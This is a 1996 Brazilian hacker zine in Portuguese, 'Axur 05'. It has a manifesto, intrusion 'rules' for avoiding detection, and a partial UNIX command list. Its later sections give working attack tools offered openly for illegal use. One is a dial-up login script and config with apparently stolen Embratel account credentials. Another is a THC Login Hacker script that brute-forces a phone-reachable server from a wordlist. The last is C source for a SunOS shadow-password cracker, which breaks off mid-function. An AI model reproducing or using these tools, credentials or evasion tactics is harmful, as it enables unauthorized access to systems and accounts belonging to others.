

```

-aa
-a-a  -x  -x -u  -u  -r -rr      -000  -55555
-a -a  -x -x -u  -u  -r-r      -0    -0-5
-a a-a  -x  -u  -u  -rr      -0    -0-5555
-a  -a  -x -x -u  -u  -r      -0    -0    -5
-a    -a-x  -x -uuu uu -r      -000  -5555

-- == [AXUR 05 - DARK SIDE HACKERS - BRAZIL] == --
~~~~ ~ ~ ~ ~~~~~ ~~~~~~ ~~~~~~

```

Axur 05 - revista mensal ( todos dia 01 na BBS mais próxima).

Hackerland, 30 de Dezembro de 1996  
 Revista nº - 0.80 ( ver. beta final)

Sem mestres, sem lamahs, sem deuses... somente no's e nossas ma'quinas.  
 Pra salvar a honra dos Brasileiros! yo outside \*fuck you\*

}-----[chain]-----{-{

Itz time to face the music  
 bud...

- GOD

Simple... but really a pretty penny!

- SATAN

#### INDICE:

- 1-) OFFERTORIUM
- 2-) QUAL NOSSO OBJETIVO COM ESSE ZINE UNDERGROUND?
- 3-) EXISTE UMA ETICA SIM!
- 4-) COMECANDO A COMECAR...
- 5-) TECNICAS TELEFONICAS USADAS
- 6-) HUMM... UM SENHA DA EMBRATEL
- 7-) HACK SCRIPT PARA O LOGIN HACK/THC
- 8-) MEU PROPRIO DESENCRIPTADOR DE SENHAS...
- 9-) ANARCHY - by Haphazard
- 10-) Cartas: ( como entrar em contato).
- \*-) EXTRA BONUS - Senhas da KANOPUS e da NETVILLE

}-----[chain]-----{-{

#### 1-) OFFERTORIUM...

~~~~~

Bom, pra comeco de conversa escrever esse fatidico zine esta sendo dificil,  
 esperamos inicialmente uma colaboracao da parte de voces para que realmen-  
 te possamos comecar a nos divertir.  
 Textos escritos por AcIdmuD, VooDoo, Haphazard e ???????... todos cidadoes  
 conscientes do mal que estao fazendo a sociedade e pouco se importante com  
 o uso que os jovens inconsequentes farao do conteudo deste ou de outras das  
 nossas publicacoes.  
 Garanto que depois que sair o numero um vai aparecer um monte de bostinha fa-  
 lando "Eles nao sao hackers, pois nao seguem a ETICA HACKER".... meus ami-  
 gos, quem faz a ETICA e' voce proprio! Se nos quisermos sair por ai detonan-  
 do problema e' nosso. Ja vou avisando, nao gostou - NAO LEIA.  
 Essa revista e' pra voce que como no's nao tem medo de desafios.  
 Cópia restrita, liberada apenas para BBS cadastradas. Liberado o escambo

por meio de correio eletrônico. Qualquer publicação indevida do texto abaixo deverá conter de onde foi tirado e tal...

}-----[chain]-----{

## 2-) QUAL NOSSO OBJETIVO COM ESSE ZINE UNDERGROUND?

~~~~~

Desmistificar que não existe hacker no Brasil e chutar a bunda dos prepotentes donos de provedores que exploram seus associados até as tripas. Todos sabemos que a nossa raça está em extinção, não nos colocamos como hacker e sim como pessoas comuns que detêm um conhecimento um pouco acima do normal e por esse motivo tem quase que a obrigação de passá-los para não levar consigo para a terra dos pes juntos exterminando assim com um referencial de quem procura um aprimoramento em hack, phreak... (somente para quem está disposto a aprender), pois é um saco ver um bando de garotos metidos que gostam apenas de aprender o truque em si e não a técnica que foi usada e o método que está sendo desenvolvido. Programadores sejam bem vindos... teremos prazer em divulgar fontes de programas (pelo menos uma por edição) especialmente desenvolvidos para finalidades ilegais. Será bom para quem estuda programação porque nos cortamos a baléla de falar, falar, falar... queremos ação!

Não temos nada contra a revista BARATA ELETRICA, mas entre no's o negócio é muito fraco e sugere a proliferação desenfreada de "burrinhos" como diria nosso amigo Derneval.

Espero que os assuntos discutidos interessem a todos e os façam crescer ao nível lá de fora, levando em conta que tomamos uma baita surra se formos tentar nos comparar a eles.

Lembrando: "Hacker não é aquele que faz flood em um canal do IRC, nem aquele que manda mail bomb e muito menos aquele que cria vírus com kitziinho e sai aí phudendo com os amigos", hacker é aquele que ama seu computador a ponto de transformar um XT inerte em um instrumento de descriptação ou que conheça o terreno onde pisa, conheça TCP/IP como só ele, saiba todos os comandos do UNIX e seus parâmetros na ponta da língua ou ainda esteja em contato pleno as novidades do seu mundo.

"Nos só seremos livres o dia em que o último dono de provedor for enforcado nas tripas do último lamer." Li isso em algum lugar... e gostei! ;)

AVISO-----

Lamahs deletem-me do seu HD. \del axur0500.txt

}-----[chain]-----{

## 3-) EXISTEM REGRAS SIM

~~~~~

Já disse, só estamos escrevendo esse monte de coisa por ser nosso primeiro número. Mas é bom resaltar alguns aspectos para que não haja besteira no início, detonar "SIM" mas na medida do necessário e de forma que você novato não seja pego.

Sigam alguns mandamentos listados abaixo e o resto é besteira.

- 1- Descobriu algo novo, OLHE
- 2- NÃO APAGUE, pense no que seria melhor; ter acesso a um provedor ou detoná-lo?
- 3- NÃO MODIFIQUE NADA, ao menos que queira que saibam que esteve lá.
- 4- Nunca tente um su root direto! Isso fica logado ;-)
- 5- Não fique dando telnet ou pegando mail usando acesso dos outros!
- 6- Nunca subste um sysop
- 7- Escolha horas entre 24:30 as 6:00
- 8- Uma vez lá dentro tente dominar o lugar, é claro, com cautela.
- 9- Não confie em ninguém. (salve seu cachorro ou sua planta).
- 10- Se pegar a senha do root de algum provedor e não souber o que fazer MATE-SE
- 11- Não teste vírus no seu próprio HD.
- 12- É bom preparar muito bem uma estratégia antes de atacar.
- 13- Use os computadores de sua universidade (é mais seguro).
- 14- Não fique distribuindo informações para ninguém ou dados sobre o que

vc pegou.  
 15- NAO OBEDECA REGRAS. Claro que estas tem que ser cumpridas.  
 16- Nao tenha pena de ninguem.  
 17- Vc usa o MS-DOze ou o windoze? Nao conte pra ninguem...  
 18- Vc usa o algum UNIX ou LINUX? Esteja certo que esta bem seguro...  
 19- Nao crie lacos afetivos com a vitima.  
 20- Aprenda o maximo que puder com quem sabe mais! Nao se meta a besta  
 direto  
 ULTIMO: Nao se submeta a nenhum sistema hierarquico. Administradores phe-  
 dem.

}-----[chain]-----{

#### 4-) COMECANDO A COMECAR ~~~~~

Nao adianta chorar boneca! Se quiser comecar a fazer alguma coisa delete de seu HD o windows ou o ms-dos... rode algo mais poderoso.  
 Perg: "Papai... nao sei nada de UNIX como vou operar o melhor sistem mul-  
 tiusuario do mundo? "  
 Resposta: Vamos tentar colocar uma lista auto-explicativa de todos os co-  
 mandos do UNIX, tendo em vista que alguns comandos mudam dependendo do  
 UNIX.  
 Imagino que voces saibam pelo menos do que estamos falando e tenham uma  
 base disso. Nao tem misterio, mas so nao dah e' pra ficar parado.  
 Vamos comecar bombardiando voces com comandos do UNIX, como existem vari-  
 os tipos de UNIX ( HP-UX, AIX, SCO etc...) alguns comando diferem depen-  
 dendo do seu sistema operacional, a medida do possivel vamos tentar colo-  
 car os respectivos para cada sistema.  
 Sendo que essa nao sera a ultima vez que abordaremos os comandos basicos  
 e avancados do unix, pretendemos colocar voces bem por dentro antes de  
 sair por ai falando besteira.  
 Se voce esta atras de conhecimento mesmo acho que essa lista de comando  
 ira lhe dar uma pequena base. Nao pense que somente com isso voce podera  
 sair dizendo que ja sabe operar um sis. unix.  
 Seja humilde e leia, vamos lah! Temos que comecar por ai mesmo, nas pro-  
 ximas edicoes da revistas AXUR 05 vamos colocar mais e mais dicas sobre o  
 nosso rapaz.

Lista de comandos compilada por Acidmud - (c)1996 - Global Domination Inc.

| COMANDO | DESCRICAO |
|---------|-----------|
| ~~~~~   | ~~~~~     |

|    |                                                                                                                                                                                                                                                                                                                                                                                                                                                         |
|----|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| as | Esse e' o montador usado para montar fontes em<br>linguagem asm. Pra ter uma melhor definicao e'me-<br>lhor consultar o guia do System V.<br>Opcao -o: nome que ouser quer dar ao arquivo .obj<br>criado. Se nao usar o nome do arquivo vai sair co-<br>mo o mesmo nome mas com o sufixo .o.<br>Opcao -R: apaga o arquivo de entrada apos termino<br>da montagem.<br>Opcao -V: a versao do montador e' incluida na sai-<br>da gravada na saida de erro. |
|----|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|

|     |                                                                                                                                                                                                                                                    |
|-----|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| awk | O filtro AWK e'um programa de analise de padroes<br>que le arquivos linha por linha. As as instrucoes<br>do comando AWK sao na verdade um poderosa lingua-<br>gem de programacao.<br>Seu formato geral e':<br>awk `programa` nome(s)_de_arquivo(s) |
|-----|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|

|        |                                                                                                                                                                                                                                                                                                              |
|--------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| banner | Programa usado pra fazer letras gigantes Os cara-<br>cteres de entrada sao ecoados na saida padrao com<br>letras gigantes. Pode ser usar no MAXIMO 10 cara-<br>cteres e nao e' recomendado usar espaco pois esses<br>serao usados como delimitadores de partes que apa-<br>recem em partes separadas. Tente: |
|--------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|

banner Eu to aprendendo

Pode direcionar para um arquivo:

banner Eu to aprendo > legal.sim

**bdiff** Compara dois arquivos grandes.

**bfs** Procura um arquivo grande.

**cal** Mostra o calendario.

**cat** Concatena e imprime arquivos.

**cb** Embelezador de C. Muito util para desenvolvedores de programas em UNIX.  
cb -s velhofonte.c > novofonte.c

**cc** Esse e' o comando usado para chamar o compilador C do sistema unix. O formato geral e' o seguinte:  
cc opcao(oes) arquivo(s)

As principais opcoes sao:  
-c: cria um arquivo .o que vai conter dados da fase de ligacao e edicao do processo. Normalmente o arquivo .o e' apagado durante o processo.

**cd** Muda diretorio ( igual MS-DOS).

**chgrp** Muda o dono de um arquivo. Esse comando e' phoda de explicar. Mas vamos tentar.  
Quando um arquivo e' criado sao lhe atribuidos valores de propriedade, os valores sao atribuidos de acordo com os valores umask do dono no momento da criacao do arquivo.  
Voce pode ser dono, grupo ou user.  
Comando usado e':

chgrp novo\_grupo nome\_do\_arquivo

**chmod** Comando usado para mudar permissoes de arquivos  
Existe tres tipos de permissoes:  
r - read valor= 1  
w - write valor= 2  
x - execute valor= 4  
Os arquivos listados ecoam da seguinte forma:

3 -r-xr-xr-x 1 uucp sys 1309 Jan 3 1986 Uutry

Temos assim que olhar no rwx r-x r-x

|        |  |  |
|--------|--|--|
|        |  |  |
| dono   |  |  |
| grupo  |  |  |
| outros |  |  |

No caso o usuario tem r-x que na tabela de valores corresponde a 5

Podemos trocar uma permissao entao assim:

chmod 005 nome\_do\_arquivo

Ai o arquivo ficaria assim:

3 -----r-x 1 uucp sys 1309 Jan 3 1986 Uutry

Ou poderia faze-lo assim:

chmod a+rw nome\_do\_arquivo

O caracter "a" antes do +rw significa "todos os grupos".  
O sinal + e - sao para atribuir e retirar respectivamente.

**chown** Comando usado para passar a propriedade de um para outra pessoa. O formato geral do comando e':

chown novo\_dono nome\_do\_arquivo

**cmp** Compara dois arquivos e mostra localizacao linha

e byte desde a primeira diferenca.  
Caso do conteudo ser identico e nao imprimi nada na tela.  
Tem duas opcoes -l pra lista longa e -s para lista curta.

comm                    Compara dois arquivos e determina qual linha e' comum para os dois

cp                      Copia um arquivo para outra localizacao.  
Muito usado para duplicar arquivos. Formato geral:

cp arquivo1 arquivo2

Sendo que o arquivo1 e' o arquivo de entrada, e o arquivo2 o arquivo de saida, este pode ser direcionado para qualquer localizacao.

CUIDADO: Esse comando nao pede confirmacao, logo tenha certeza do que esta fazendo, caso contrario podera modificar o conteudo do seus arquivos.

cpio                    E' um comando muito importante do UNIX e tb muito util geralmente usado para copias de seguranca.

Ele faz a copia de entrada e saida, e' particularmente poderoso quando combinado com o comando 'find' e o comando 'ls' em um instrucao composta. Ele tem tres modos basicos que sao determinados pelas opcoes -o, -i e -p. A opcao -o indica que o comando cpio deve criar um arquivo especial de saida que sera lido pelo comando -i.

O arquivo de saida criado usando a opcao -o e' um arquivo sequencial e pode ser manipulado por outros comandos, como o pack e o unpack.

Podemos usar um enlace de comunicacao por meio do arquivo de transmissao do uucp. Podemos ate copiar algo de um sistema unix para uma rede local.

Voce deve criar o arquivo de transmissao com o cpio e transmitir com o uucp.

Vamos criar o arquivo de transmissao:

```
find /usr/tsm - print | cpio -ocv > arqtransm
```

No caso o arquivo find comeca no diretorio /usr/tsm e imprime os nomes dos arquivos na saida padrao pegando todos os subdiretorios que se encontram desse nivel em diante.

A opcao -ocv significa que o cpio deve criar um arquivo de saida (o) onde as informacoes do cabeçalho deve ser gravadas em ASCII, para assegurar portabilidade (c), e que a medida que cada arquivo for processado, seu nome deve ser exibido na tela.

Uma vez tendo o arquivo de saida arqtransm podemos envia-lo pelo comando uucp. Uma pratica comum e' compactar os arquivos para que a transmissao suceda de um modo mais rapido e com menas quantidade de dados. Pode compactar com o pack e descompactar com o unpack, mais tarde explicarei isso.

Antes de executar o cpio seria necessario tornar corrente o diretorio /usr/wbu. Usando o nome arqtransm de nosso exemplo anterior, a seguinte linha de comando seria entao usada para le-lo e restaurar os arquivos e diretorios que contem:

```
cpio -icduvm < /usr/spool/uucppub/arqtransm
```

As opcoes (-icduvm) podem aparecer em qualquer ordem, essa ordem e' a convencional. Com a opcao -i primeiro da pra observar qual operacao o cpio esta usando. A opcao -d indica os que os diretorios nao existentes no destino devem ser criados; a opcao -u indica que todos os arquivos do arquivo de entrada devem ser restaurados, substituindo eventuais arquivos com mesmo nome no diretorio de destino. A acao de restauracao tomada pela opcao -u nao e'

especificada a manter o nome do arquivo mais novo dos dois; isso e' determinada pelo registro de data e hora presente no inodo do arquivo. O operador de redirecionamento indica onde esta localizado o arquivo de entrada do cpio, nesse caso o percurso absoluto /usr/spool/uucppublic/arqtransm. O diretorio /usr/spool/uucppublic e' aberto para ser acessado por todos e e' onde o uucp coloca dados sem se preocupar com as permissões de acesso do arquivo. O modo -p (passe) permite copia em massa, executando o processamento de entrada e de saida em uma unica operacao:

```
find /usr/tsm -print | cpio -pduvm /usr/wbu
```

Esse comando primeiro executa o find para criar uma lista dos arquivos e diretorios que serao usados como entrada do cpio. A saida sera colocada no diretorio chamado /usr/wbu. Nesse exemplo, todos os arquivos com nomes identicos ja existentes no diretorio de destino serao substituidos pois a opcao -u foi usada.

cu E' o comando que chama UNIX (call UNIX) estabelece uma sessao com outro sistema remoto.

cut Comando usado para extrair informacoes selecionadas de um arquivo de entrada. Opcao -d e' usada para especificar o caracter delimitador, se nao colocar nada ele pega como padrao um unico espaco em branco. Opcao -f e' usada para indicar quais campos serao recortados. Tipo assim, para listar todas as IDs de usuarios e seus nomes, o seguinte comando poderia ser usado:

```
cat /etc/passwd | cut -d":" -f1,5
```

date Exibe a data do sistema:  
Dia Mes dd hh:mm:ss TZ ( time zone) aaaa  
Esse comando nao e' muito interessante para entrarmos em detalhes.

df Mostra o espaco livre no file system.

diff Mostra na tela diferencas entre dois arquivos ou diretorios.

diff3 Mostra na tela diferencas entre tres arquivos ou diretorios.

du Reports de um file sistem usado.

echo Mostra na tela um argumento.

ed Editor de texto padrao distribuido com a maioria dos sistemas UNIX. Nao e' tao rico como os editores de texto do padrao MS-DOS. Mas o negocio ta mudando rapidamente, pode ser alternado com o vi.

egrep Da familia dos comandos grep de busca de padroes. Ele geralmente aceita expressoes regulares que o grep nao aceita. Pode ser:

```
egrep Rudi+ /etc/passwd
```

Essa forma é mais lenta pq primeiro copia o arquivo e depois filtra.

fgrep E' o grep rapido. Por nao usar tempo nenhum na avaliacao das expressoes como ocorre no comando egrep. So aceita cadeias como padrao de busca.

f77                      Compilador FORTRAN.

|         |                                                 |
|---------|-------------------------------------------------|
| find    | Localiza um arquivo com características especi- |
| ficadas |                                                 |

----- O RESTO DA LISTA NA PROXIMA EDICAO -----

Comecem com isso, acho que jogar tantos comandos de uma vez so nao e' legal portanto, na proxima AXUR 05 vamos colocar o resto dos comandos. Nosso objetivo e' criar a maior lista compilada em um arquivo ate hoje de comandos de UNIX em portgues. Tomara que o nosso trabalho valha a pena! ;)

```
}-===== [chain] ===== -{
```

6-) HUMM... UMA SENHA DA EMBRATEL  
~~~~~ ~~~ ~~~~~ ~ ~~~~~~

Esse script deve ser usado com o Trumpet winsock.  
O script em si e' uma fonte que eu usei de um provedor gaúcho, usei ele porque ele e' muito bem feito e facilitou o trabalho.  
O provedor o qual nao citarei o nome nao tem nada a ver com nossas encenacas, falo isso pq conheço o pessoal de lah e eles sao realmente bacanas. ;)

P: De quem e' essa conta?  
R: De um escola de computacao filha da puta de Canoas-RS.

P: Qual o crime que eles cometeram?  
R: Cursos caros com baixa qualidade...formando assim mais "burrinhos"

P: Isso nao e' arriscado demais?  
R: Bom... atravessar a rua hoje em dia e' arriscado.

R: O acesso e' FREE, mas a taxa telefonica e' por sua responsabilidade.

Podé distribuir esse script para quem voce quiser, mas nao esqueca de deixar o nome do autor ;)

```
#corte aqui-----login.cmd-----
```

```
#ACID-HACK-ACID-HACK-ACID-HACK-ACID-HACK-ACID-HACK-ACID-HACK-ACID-HAC#
#
#                               ACiD HackNet                               #
#                               (c)Reg. ACiDmuD 10/08/96                     #
#                               - acidmud@thepentagon.com -                 #
#
#####
#
# Desculpa a desorganizacao dos codigos do script ta meio                #
# improvisado! Mas funciona mesmo.                                         #
#
#ACID-HACK-ACID-HACK-ACID-HACK-ACID-HACK-ACID-HACK-ACID-HACK-ACID-HAC#
```

```

%tentativas = 16

$inicmodem = "AT&C1E1X4"
# O comando AT e normal, ja o X3 despressa o sinal de ocupado
# eu uso no meu modem por causa da central. Mas nao faz mal.
# Se quiser tirar pode tirar...
# O 0, serve para chamar linha no caso de central telefonica.

$dialstr = "ATX3DP0,"

load $password
$numero = "0900992880"
$numero2 = "0900991440"
load $password
if [password "Nao precisa colocar nada, so pressione enter:"]
    save $password
end

load $username
if [username "Nao precisa colocar nada, so pressione enter:"]
    save $password
end

output "ATZ"\13

if ! [input 10 OK\n]
    display \n"Modem nao responde."\n
    display \n"Verifique sua configuracao."\n
    abort
end
output $inicmodem\13
input 10 OK\n

display "Inicio da discagem." %tentativas "tentativas, caso ocupado."\n

%n = 0
%ok = 0

repeat
    %timeout = 1
    while %timeout
        %timeout = [read 2 $branco]
    end
    if %n = %tentativas
display \n"Ocupado mesmo apos" %tentativas "tentativas"\n
output +++
        output ATH0\r
        abort
    end
    %n = %n + 1
    display \n"yo!. Hacking.... (tentativa" %n")..." \n
    outputecho $dialstr $numero\13
    if $numero = $numero1
$numero = $numero2

```



```

else
if $numero = $numero2
$numero = $numero1
end
end
$result = ""
$result2 = ""
while $result = ""
    %timeout = [read 80 $result]
    if !%timeout
        $result = "MODEM NAO RESPONDE"
    end
end
$result2 = copy($result,1,7)
until $result2 = "CARRIER" | $result2 = "CONNECT" | $result2 = "PROTOCO"
%timeout = 1
%timeout = [wait 15 dcd]
if !%timeout
    display \n"Seu modem nao esta bem configurado." \n
    display \n"Verifique a configuracao do seu modem." \n
end

input 30 name:
output $username\13
input 30 word:
output \p\13
input 30 >

    output ppp default\13
    address 30
    input 30 \n

display \n

display "Yo! Tudo deu certo... voce ja esta conectado!." \n
display \n"(c)Reg. by Acidmud - acidmud@thepentagon.com." \n

#corte aqui-----login.cmd-----

Agora voce deve renomear seu arquivo trumpwsk.ini para trumpwsk.old
e criar um novo arquivo trumpsk.ini com o conteudo abaixo

#corte aqui-----trumpwsk.ini-----

[Trumpet winsock]
ip=200.255.255.89
netmask=0.0.0.0
gateway=0.0.0.0
dns=200.255.253.241
time=200.255.253.241
domain=embratel.net.br
vector=60
mtu=296
rwin=1024

```

```

mss=256
rtomax=60
ip-buffers=32
slip-enabled=1
slip-port=2
slip-baudrate=28800
slip-handshake=1
slip-compressed=1
dial-option=0
online-check=1
inactivity-timeout=5
slip-timeout=0
slip-redial=0
dial-parity=0
font=Courier,9
registration-name=""
registration-password="h[G?"Rg]"
use-socks=0
socks-host=0.0.0.0
socks-port=1080
socks-id=
socks-local1=0.0.0.0 0.0.0.0
socks-local2=0.0.0.0 0.0.0.0
socks-local3=0.0.0.0 0.0.0.0
socks-local4=0.0.0.0 0.0.0.0
ppp-enabled=1
ppp-usepap=0
ppp-username=""
ppp-password=""
win-posn=88 88 636 408 21 408 -4 -4 3
trace-options=0

```

```

[default vars]
$username=sispro
$password=;/ "tkwi

```

#corte aqui-----trumpwsk.ini-----

```

}-=====[chain]=====}-{

```

## 7-) LOGIN HACK PARA O HACK LOGIN/THC

A muito tempo o pessoal tava perguntando, onde eu posso pegar um programa que tente logar alguma coisa usando como base de tentativas um .dic... Bom. O melhor que eu conheço é o LOGINH.ZIP da THC que recebi da L.O.R.E uma das melhores BBSz da Europa, mas é como usar sendo o padrão telefônico brasileiro diferente. Vocês não vão encontrar problema não, basta fazer direitinho.

Primeiro lugar vocês vão ter que ir atrás do loginh.zip, o arquivo está por aí. Não adianta nos mandar mail que não vamos mandar ele para ninguém. Não por não querer e sim pq se formos atender a todos nós estamos fudidos. Depois de pegar o dito cujo vocês devem configurar o programa, coisa muito fácil e quase que automático.

Agora vocês vão ter que catar o programa LH-COMP.EXE que também é da THC sendo que esse vai compilar o script hacker para ser usado com o LOGINH. Quando eu peguei o LOGINH, no pacote esse programa veio junto.

Como compilar o script DEC-SERV.LHK

Facilimo! Recorte onde está indicando e crie um arquivo chamado de DEC-SERV.LHK onde você deve colar o conteúdo aqui assinalado. Não se esqueça de mudar a fonte desse arquivo e colocar número do telefone e outros dados necessários para funcionar. Depois escreva no prompt:

```
lh-comp dec-serv.lhk
```

Você vai notar que vai aparecer no seu diretório o arquivo DEC-SERV.SCR este é o script em si, já compilado.

\* Com o passar do tempo se a revista for um sucesso ( o que vai depender de voce ) nos vamos criar um FTP com os programas que citamos. Coloque esse arquivo DE-SERV.SCR no mesmo diretorio que o LOGINH.EXE Execute o LOGINH.EXE e carregue o arquivo. Ate crianca consegue fazer isso... Se nao conseguir voce nao merece fazer-lo mesmo! ];) NOTA: Voce pode modificar a fonte, mas nao mude o nome do autor. Caso voce crie um script bom, mande que nos publicamos.

```
; corte aqui-----DEC-SERV.LHK-----
;
;
; -----
; Dec-Telnet-Platform Script for THC-Login-Hacker v0.9B (by Tron X)
; Global Domination Inc. - by VooDoo and AcIdMuD -Brazil- 1996
; -----
; *Fonte do script original modificada para atender aos padroes
; brasileiro. - acidmud@thepentagon.com -
; -----
; Tudo que aparecer com o sinal ";" na frente e' comentario ou instru-
; cao.
;
;
;
;#DEFINE
; Abaixo inicializacao do modem ( Default AT Z)
init_modem=at z
; 8 bits sem paridade
init_data=8n1
; Abaixo arquivo onde ficarao logados os comentarios.
LOGFILE=c:\output\hacklog.log
; Telefone alvo
PHONE_NR=0,2228344
; Numero de discagens ( o 0 significa infinitas vezes.)
DIAL_TRIES=0
; Numero de vezes para tentar logar
LOGIN_TRIES=0
; Coloque abaixo o caminho onde se localiza sua wordlist. Se voce quiser
; pode ter mais que um caminho, tirando o sinal ";" da frente do dic(2).
DIC(1)=C:\hacking\diction.ary\vh_basic.dic
;dic(2)=c:\hacking\bigdict2.txt
;dic(3)=c:\hacking\bigdict3.txt

#NOCARRIER
LOG(NO CARRIER)
LOG(ON $DATE $TIME)
LOG(AT $DIC(1))
LOG(retornando ...)
GOTO(#START)

#START
HANGUP
LOG_SESSION_ON
LOG()
log(-----)
log( Brazil - (c)Reg. by AcIdMuD and VooDoo)
log( Global Domination Inc. - 1996 -)
log()
log( Iniciando processo ..... )
log()
log( ALVo: $PHONE_NR )
log( DATA: $DATE )
log( HORA: $TIME)
log()
log()
log( .....DISCANDO)
dial
log()
log( .....CONECTADO!)
log()
log()
wait(5)
:1
wait4string(1,^M,5,goto(#start),sername>)
send(fh65)
:2
wait4string(1,^M,5,goto(#start),ocal>)
```



## 8-) MEU PROPRIO DESENCRIPTADOR DE SENHAS...

~~~~ ~~~~~~ ~~~~~~ ~~~~~~ ~~~~~~

Essa é a fonte de um descriptador de senhas do arquivo shadow padrão SUNOS.

O descriptador é um programa que a partir de uma wordlist e um arquivo com as senhas encriptadas (e claro) recria o valor dos códigos dando assim o login com seu respectivo password.

Corte a linha abaixo e cole em um arquivo vazio, para isso use um editor de textos, logo após compile ele.  
Não fomos nós que fizemos, devemos créditos a The Shining/UPi(UK Division)

---CORTE AQUI-----

```
/* Program   : Shadow Crack
   Author    : (c)1996 The Shining/UPi (UK Division)
   Date     : Released 12/4/96
   Unix type : Somente para arquivos shadowed do sistema SUNOS */

#include <stdio.h>
#include <pwd.h>
#include <string.h>
#include <ctype.h>
#include <signal.h>

#define WORDSIZE 20      /* Tamanho maximo da palavra */
#define OUTFILE "data"  /* Arquivo que armazena info. da conta crackeada */

void word_strat( void ), do_dict( void );
void add_nums( char * ), do_comment( char * );
void try_word( char * ), reverse_word( char * );
void find_mode( void ), burst_mode( void );
void mini_burst( void ), brute_force( void );
void user_info( void ), write_details( char * );
void pwfile_name( void ), disable_interrups( void ), cleanup();

char *logname, *comment, *homedir, *shell, *dict, *mode,
     *pwfile, *pwdauth();
struct passwd *getpwnam(), *pwnentry;
extern char *optarg;
int option, uid, gid;

int main( int argc, char **argv )
{
    disable_interrups();
    system("clear");

    if (argc < 2) {
        printf("Shadow Crack - (c)1996 The Shining\n");
        printf("SUNOS Shadow password brute force cracker\n\n");
        printf("usage: %s -m[mode] -p[pwfile] -u[loginid] ", argv[0]);
        printf("-d[dictfile]\n\n\n");
        printf("[b] is burst mode, scans pwfile trying minimum\n");
        printf("password strategies on all i.d's\n\n");
        printf("[i] is mini-burst mode, scans pwfile trying both\n");
        printf("userid, gecos info, and numbers to all i.d's\n\n");
        printf("[f] is brute force mode, tries all above strategies\n");
        printf("as well as dictionary words\n\n");
        printf("[pwfile] uses the password file [pwfile], default\n");
        printf("is /etc/passwd\n\n");
        printf("[loginid] Account you wish to crack, used with\n");
        printf("-mf brute force mode only\n\n");
        printf("[dictfile] uses dictionary file [dictfile] to\n");
        printf("generate passwords when used with\n");
        printf("-mf brute force mode only\n\n");
        exit(0);
    }
}
```

```

}

/* Get options from the command line and store them in different
variables */

while ((option = getopt(argc, argv, "m:p:u:d:")) != EOF)
switch(option)
{
    case 'm':
        mode = optarg;
        break;

    case 'p':
        pwfile = optarg;
        break;

    case 'u':
        logname = optarg;
        break;

    case 'd':
        dict = optarg;
        break;

    default:
        printf("wrong options\n");
        break;
}

find_mode();
}

/* Routine to redirect interrupts */

void disable_interrups( void )
{
    signal(SIGHUP, SIG_IGN);
    signal(SIGTSTP, cleanup);
    signal(SIGINT, cleanup);
    signal(SIGQUIT, cleanup);
    signal(SIGTERM, cleanup);
}

/* If CTRL-Z or CTRL-C is pressed, clean up & quit */

void cleanup( void )
{
    FILE *fp;

    if ((fp = fopen("gecos", "r")) != NULL)
        remove("gecos");

    if ((fp = fopen("data", "r")) == NULL)
        printf("\nNo accounts cracked\n");

    printf("Quitting\n");
    exit(0);
}

/* Function to decide which mode is being used and call appropriate
routine */

void find_mode( void )
{
    if (strcmp(mode, "b") == NULL)
        burst_mode();
    else
        if (strcmp(mode, "i") == NULL)
            mini_burst();
        else
            if (strcmp(mode, "f") == NULL)
                brute_force();
}

```

```

else
{
    printf("Sorry - No such mode\n");
    exit(0);
}
}

/* Get a users information from the password file */

void user_info( void )
{
    uid = pwntry->pw_uid;
    gid = pwntry->pw_gid;
    comment = pwntry->pw_gecos;
    homedir = pwntry->pw_dir;
    shell = pwntry->pw_shell;
}

/* Set the filename of the password file to be used, default is
/etc/passwd */

void pwfile_name( void )
{
    if (pwfile != NULL)
        setpwfile(pwfile);
}

/* Burst mode, tries user i.d. & then reverses it as possible passwords
on every account found in the password file */

void burst_mode( void )
{
    pwfile_name();
    setpwent();

    while ((pwntry = getpwent()) != (struct passwd *) NULL)
    {
        logname = pwntry->pw_name;
        user_info();
        try_word( logname );
        reverse_word( logname );
    }

    endpwent();
}

/* Mini-burst mode, try above combinations as well as other strategies
which include adding numbers to the end of the user i.d. to generate
passwords or using the comment field information in the password
file */

void mini_burst( void )
{
    pwfile_name();
    setpwent();

    while ((pwntry = getpwent()) != (struct passwd *) NULL)
    {
        logname = pwntry->pw_name;
        user_info();
        word_strat();
    }

    endpwent();
}

/* Brute force mode, uses all the above strategies as well using a
dictionary file to generate possible passwords */

```

```

void brute_force( void )
{
    pwfile_name();
    setpwent();

    if ((pwntry = getpwnam(logname)) == (struct passwd *) NULL) {
        printf("Sorry - User unknown\n");
        exit(0);
    }
    else
    {
        user_info();
        word_strat();
        do_dict();
    }

    endpwent();
}

/* Calls the various password guessing strategies */

void word_strat()
{
    try_word( logname );
    reverse_word( logname );
    add_nums( logname );
    do_comment( comment );
}

/* Takes the user name as its argument and then generates possible
   passwords by adding the numbers 0-9 to the end. If the username
   is greater than 7 characters, don't bother */

void add_nums( char *wd )
{
    int i;
    char temp[2], buff[WORDSIZE];

    if (strlen(wd) < 8) {
        for (i = 0; i < 10; i++)
        {
            strcpy(buff, wd);
            sprintf(temp, "%d", i);
            strcat(wd, temp);
            try_word( wd );
            strcpy(wd, buff);
        }
    }
}

/* Gets info from the 'gecos' comment field in the password file,
   then process this information generating possible passwords from it */

void do_comment( char *wd )
{
    FILE *fp;

    char temp[2], buff[WORDSIZE];
    int c, flag;

    flag = 0;

    /* Open file & store users gecost information in it. w+ mode
       allows us to write to it & then read from it. */

    if ((fp = fopen("gecos", "w+")) == NULL) {
        printf("Error writing gecost info\n");
        exit(0);
    }
}

```



```

    fprintf(fp, "%s\n", wd);
    rewind(fp);

strcpy(buff, "");

/* Process users gecost information, separate words by checking for the
',,' field separator or a space. */

while ((c = fgetc(fp)) != EOF)
{
    if ((c != ',') && (c != ' ')) {
        sprintf(temp, "%c", c);
        strncat(buff, temp, 1);
    }
    else
        flag = 1;

    if ((isspace(c)) || (c == ',') != NULL) {
        if (flag == 1) {
            c=fgetc(fp);
